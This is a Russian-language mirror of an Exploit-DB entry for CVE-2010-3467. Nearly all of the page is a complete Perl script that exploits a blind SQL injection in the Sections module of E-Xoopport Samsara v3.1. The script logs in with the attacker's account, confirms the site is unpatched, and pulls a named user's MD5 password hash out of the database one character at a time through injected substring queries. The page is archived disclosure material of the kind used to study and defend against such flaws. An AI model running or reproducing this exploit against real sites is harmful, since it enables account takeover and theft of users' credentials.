- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15004
- Проверка EDB
-
- Пройдено
- Автор
- _MRKZ_
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-3467
- Дата публикации
- 2010-09-14
Код:
#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_ & Dante90, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Web Site: www.warwolfz.org
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
$^O eq 'MSWin32' ? system('cls') : system('clear');
print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport |
| Affected versions: 3.1 |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew |
| Web Site: www.warwolfz.org |
+---------------------------------------------------+
";
if (@ARGV != 4) {
print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
exit;
}
$host = $ARGV[0];
$usr = $ARGV[1];
$pwd = $ARGV[2];
$anickde = $ARGV[3];
$anick = '0x'.EncHex($anickde);
print "[+] Logging In...\r\n";
my %postdata = (
uname => "$usr",
pass => "$pwd"
);
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req = (POST $host, \%postdata);
my $cookies = HTTP::Cookies->new();
$request = $ua->request($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<head><meta http-equiv="Refresh" content="0; URL=modules\/news\/" \/><\/head>/i) {
print "[+] Logged in\r\n";
} else {
print "[-] Fatal Error: username/password incorrect?\r\n";
exit;
}
print "[!] Retriving section id...\r\n";
$idi = 0;
while ($idi != 11) {
$idi++;
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req = $host."/modules/sections/index.php?op=listarticles&secid=$idi";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
$secid = $idi;
last;
}
}
if(!defined $secid) {
print "[-] Fatal Error: Section id not found!\r\n";
exit;
} else {
print "[+] Section id '$secid' retrieved\r\n";
}
print "[!] Checking path...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /Ecco i documenti della sezione/i) {
print "[+] Correct Path\r\n";
} else {
print "[-] Fatal Error: Wrong Path\r\n";
exit;
}
print "[!] Checking if vulnerability has been fixed...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+1=1";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
print "[+] Vulnerability has not been fixed...\r\n";
} else {
print "[-] Fatal Error: Vulnerability has been fixed\r\n";
open LOGG, ">log.html";
print LOGG $content;
close LOGG;
exit;
}
print "[!] Checking nick to hack...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))>0";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
print "[+] Nick exists...\r\n";
} else {
print "[-] Fatal Error: Nick does not exists\r\n";
exit;
}
print "[!] Exploiting...\r\n";
my $i = 1;
while ($i != 33) {
my $wn = 47;
while (1) {
$wn++;
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
$pwdchr .= chr($wn);
$^O eq 'MSWin32' ? system('cls') : system('clear');
PrintChars($anickde, $pwdchr, $secid);
last;
}
}
$i++;
}
print "\r\n[+] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.net\r\n\r\n";
sub PrintChars {
$anick1 = $_[0];
$chars = $_[1];
$secid = $_[2];
print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport |
| Affected versions: 3.1 |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew |
| Web Site: www.warwolfz.org |
+---------------------------------------------------+
[+] Logging In...
[+] Logged in
[!] Retriving section id...
[+] Section id '$secid' retrived
[!] Checking path...
[+] Correct Path
[!] Checking if vulnerability has been fixed...
[+] Vulnerability has not been fixed...
[!] Checking nick to hack...
[+] Nick exists...
[!] Exploiting...
[+] ".$anick1."'s md5 Password: $chars
";
}
sub EncHex {
$char = $_[0];
chomp $char;
@trans = unpack("H*", "$char");
return $trans[0];
}
- Источник
- www.exploit-db.com